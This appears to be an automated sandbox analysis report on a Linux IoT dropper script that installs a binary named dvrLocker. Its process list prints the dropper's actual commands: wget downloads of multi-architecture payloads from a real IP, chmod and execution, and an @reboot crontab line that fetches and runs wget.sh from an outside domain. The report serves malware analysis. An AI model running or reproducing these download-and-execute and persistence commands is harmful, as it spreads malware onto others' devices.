Reported
2024-11-09 08:44
Platform
debian9-mipsel-20240611-en
Max time kernel
60s
Max time network
154s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 80.152.203.134 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.u40wTl | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox telentd | /tmp/lib/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/827/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/829/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/835/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/837/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/849/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/873/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/920/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/924/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/926/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/822/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/856/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/862/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/828/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/860/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/824/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/901/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/891/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/2/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/876/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/866/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/854/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/881/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/899/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/927/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/825/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/838/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/908/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/917/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/913/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/819/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/836/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/869/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/883/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/896/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/904/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/105/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/113/exe]
/bin/ls
[ls -l /proc/114/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/143/exe]
/bin/ls
[ls -l /proc/147/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/166/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/236/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/327/exe]
/bin/ls
[ls -l /proc/329/exe]
/bin/ls
[ls -l /proc/331/exe]
/bin/ls
[ls -l /proc/335/exe]
/bin/ls
[ls -l /proc/340/exe]
/bin/ls
[ls -l /proc/36/exe]
/bin/ls
[ls -l /proc/37/exe]
/bin/ls
[ls -l /proc/379/exe]
/bin/ls
[ls -l /proc/380/exe]
/bin/ls
[ls -l /proc/384/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/425/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/670/exe]
/bin/ls
[ls -l /proc/673/exe]
/bin/ls
[ls -l /proc/677/exe]
/bin/ls
[ls -l /proc/678/exe]
/bin/ls
[ls -l /proc/684/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/70/exe]
/bin/ls
[ls -l /proc/700/exe]
/bin/ls
[ls -l /proc/701/exe]
/bin/ls
[ls -l /proc/703/exe]
/bin/ls
[ls -l /proc/704/exe]
/bin/ls
[ls -l /proc/706/exe]
/bin/ls
[ls -l /proc/707/exe]
/bin/ls
[ls -l /proc/708/exe]
/bin/ls
[ls -l /proc/71/exe]
/bin/ls
[ls -l /proc/72/exe]
/bin/ls
[ls -l /proc/73/exe]
/bin/ls
[ls -l /proc/74/exe]
/bin/ls
[ls -l /proc/75/exe]
/bin/ls
[ls -l /proc/76/exe]
/bin/ls
[ls -l /proc/77/exe]
/bin/ls
[ls -l /proc/78/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/81/exe]
/bin/ls
[ls -l /proc/83/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
/bin/rm
[rm -rf /mnt/dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
Network
| Country | Destination | Domain | Proto |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 80.152.203.134:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:20155 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | udp |
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/var/spool/cron/crontabs/tmp.u40wTl
| MD5 | 8cd195f9cc1ac87a6d7e9413b64538d9 |
| SHA1 | 9e110eaec931ddff0d54fa3372efd7b8c089975c |
| SHA256 | 8cb497497f0f07ff2bca1cf7c4fcecad4c5f2a942fa86a8cdf9b1d621f96dd68 |
| SHA512 | 2e70f0d3e836619adffa3dbf0da481f42e737cba59a83418e387a34fe7ce781eef50c1cdba4e166c1f87ae237817479b474e53702d7e9da746c22cbb4c690652 |